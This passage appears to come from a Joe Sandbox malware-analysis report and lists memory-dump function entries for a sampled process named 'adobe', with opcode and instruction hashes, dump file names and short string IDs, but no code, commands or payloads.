                      • Instruction ID: a32ea8350f38653ed7e9878274fadcd92c5ccb828e0bc323559df6a877e2d9e1
                      • Opcode Fuzzy Hash: 4a71c9734d6386dc690ae6f65b5411deb73cdad34fb71851986b673a23fd4949
                      • Instruction Fuzzy Hash: 39F065B0D18294DFCF61CA748A9877A7BB5AB43214F254DF6D445CB242E13ACE06D712
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                      • Instruction ID: 4bea0b837033cf3f53c2efa98e8238fff8a0986495897ab8cda09f589f05486a
                      • Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                      • Instruction Fuzzy Hash: B5E0C2B0E10108ABDF50DEB4CA4976E73BCD701204F208CB4D509D7201E236CB028340
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1324371161
                      • Opcode ID: e47d669de1d70aed0871c621f1aed6f37d09ff0771791c2c202cb640b1844b72
                      • Instruction ID: 0bd4cac70b4ef586e4eb722c8a0f65cc585fa4c24f09f250d7087234b12c9847
                      • Opcode Fuzzy Hash: e47d669de1d70aed0871c621f1aed6f37d09ff0771791c2c202cb640b1844b72
                      • Instruction Fuzzy Hash: 02123E30E01619CFDB68DF65C994AAEB7B6FF84304F208969D509AB364DB349D85CF80
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: e734066c947069fd864555b29dbd6796d8a11b2fa2a71e025c36a48199752568
                      • Instruction ID: f482aa9262711a14959fafb2904b75c562af20083a2895d98390030619136804
                      • Opcode Fuzzy Hash: e734066c947069fd864555b29dbd6796d8a11b2fa2a71e025c36a48199752568
                      • Instruction Fuzzy Hash: 41917230E10209DFDB64EF64DA5477EBBB2BF84304F208929D442A7798DB759D45CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 21a63567091600e1b68f094ca2e9430ff56570ae2620b4aef3f99c39869d1554
                      • Instruction ID: 71aacceaaba0c5a052c977c92f42ba3bb7988311b7f06e85d0a3fe1c6a550598
                      • Opcode Fuzzy Hash: 21a63567091600e1b68f094ca2e9430ff56570ae2620b4aef3f99c39869d1554
                      • Instruction Fuzzy Hash: FAF15130B00609CFDB58EF64C554A6EBBB3BF84304F248969D4469B768DB35EC86CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 861eaebd42a0702fdb6a660a757c9bcca8dbcde022b3eebf35f8e7aaa7d0af54
                      • Instruction ID: b2ae05fb27090d418ede0714f402e693627fbc112ad61228861708371378bbd5
                      • Opcode Fuzzy Hash: 861eaebd42a0702fdb6a660a757c9bcca8dbcde022b3eebf35f8e7aaa7d0af54
                      • Instruction Fuzzy Hash: 6AB13B30E102098FDB64EFA8C5506AEBBB2AF84314F248929D446DB359DB75DC86CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: LRkq$LRkq$$kq$$kq
                      • API String ID: 0-2392252538
                      • Opcode ID: bb068ade9825b319e6160e616d1f6c17354306fd2e835d2555a0a2c5ac99454e
                      • Instruction ID: c462ddfc1d110f8b6820b58c9adce30ffe0a71afd48fa69c89e961b7f7928ccf
                      • Opcode Fuzzy Hash: bb068ade9825b319e6160e616d1f6c17354306fd2e835d2555a0a2c5ac99454e
                      • Instruction Fuzzy Hash: A851D530B002059FDB58EB68DA40A6E77F2FF84304F148969E502DB7A9DB30EC41CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 995e444cefe75b7f07d236809459d056c716b4ca73e8336fab88e2a053ead75c
                      • Instruction ID: 99199c59ac32bb6a9954db902429e878b2d933ea60141879e06eae231de87388
                      • Opcode Fuzzy Hash: 995e444cefe75b7f07d236809459d056c716b4ca73e8336fab88e2a053ead75c
                      • Instruction Fuzzy Hash: 1E517E34E106058FDF69EB68D6806AEB7B2FF84311F248E29D44697358DB35EC41CB91